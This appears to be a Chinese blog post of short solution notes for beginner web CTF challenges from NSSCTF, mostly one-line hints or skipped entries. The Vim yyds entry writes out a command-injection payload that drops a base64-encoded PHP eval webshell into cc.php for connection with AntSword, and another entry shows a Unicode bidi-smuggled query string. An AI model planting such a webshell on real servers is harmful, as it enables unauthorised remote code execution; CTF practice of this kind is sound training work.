Web入门-入门泛做题
Web入门-入门泛做题
[LitCTF 2023]我Flag呢?
略。
[LitCTF 2023]PHP是世界上最好的语言!!
1 | from selenium import webdriver |
[NCTF 2018]签到题
抓包用重放器。
[LitCTF 2023]导弹迷踪
略。
[NSSCTF 2022 Spring Recruit]ezgame
略。
[LitCTF 2023]Follow me and hack me
1 | import requests |
[LitCTF 2023]Ping
1 | import requests |
[LitCTF 2023]作业管理系统
略。
[UUCTF 2022 新生赛]websign
在url前加上view-source:查看源代码。
[HDCTF 2023]Welcome To HDCTF 2023
???我就等了一会就赢了,拿flag???
[LitCTF 2023]Http pro max plus
第一层XFF,尝试X-Forwarded-For发现被嘲讽,正确为Client-IP。
第二层Referer,第三层代理Via,第四层改User-Agent,访问/wtfwtfwtfwtf.php和sejishikong.php。
[NISACTF 2022]checkin
一看高亮不对劲,复制到010Editor中看,把真正的参数名和值找到:
1 | http://node5.anna.nssctf.cn:28317/?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6%55%67%65%69%77%6F%E2%81%A9%E2%81%A6%63%75%69%73%68%69%79%75%61%6E=%E2%80%AE%E2%81%A6%20%46%6C%61%67%21%E2%81%A9%E2%81%A6%4E%31%53%41%43%54%46 |
[GDOUCTF 2023]EZ WEB
看源码提示路由/src,访问得到Python源码,找到/super-secret-route-nobody-will-guess路由,触发方式为PUT。
可以尝试Netcat,也可以Burpsuit抓包改HTTP头为PUT。
1 | nc node5.anna.nssctf.cn 28535 |
内容:
1 | PUT /super-secret-route-nobody-will-guess HTTP/1.1 |
[LitCTF 2023]Vim yyds
Vim强制退出会留下.index.php.swp文件,用Vim进行恢复:
1 | vim -r .index.php.swp |
POST传参:
1 | password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >cc.php |
写入木马cc.php,密码cc,蚁剑连接。
[HNCTF 2022 Week1]2048
略。
[SWPUCTF 2022 新生赛]ez_ez_php(revenge)
略。
[HNCTF 2022 Week1]easy_html
烂题。
[羊城杯 2020]easycon
https://tool.jisuapi.com/base642pic.html
[HNCTF 2022 Week1]What is Web
略。
[HNCTF 2022 Week1]easy_upload
略。
[HNCTF 2022 Week1]Interesting_http
略。
[SWPUCTF 2022 新生赛]where_am_i
抽象题别做。
[SWPUCTF 2022 新生赛]xff
略。
[SWPUCTF 2022 新生赛]js_sign
tapcode。
[MoeCTF 2021]2048
略。
[FSCTF 2023]webshell是啥捏
抽象。
[FSCTF 2023]源码!启动!
略。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 The Blog of Monoceros406!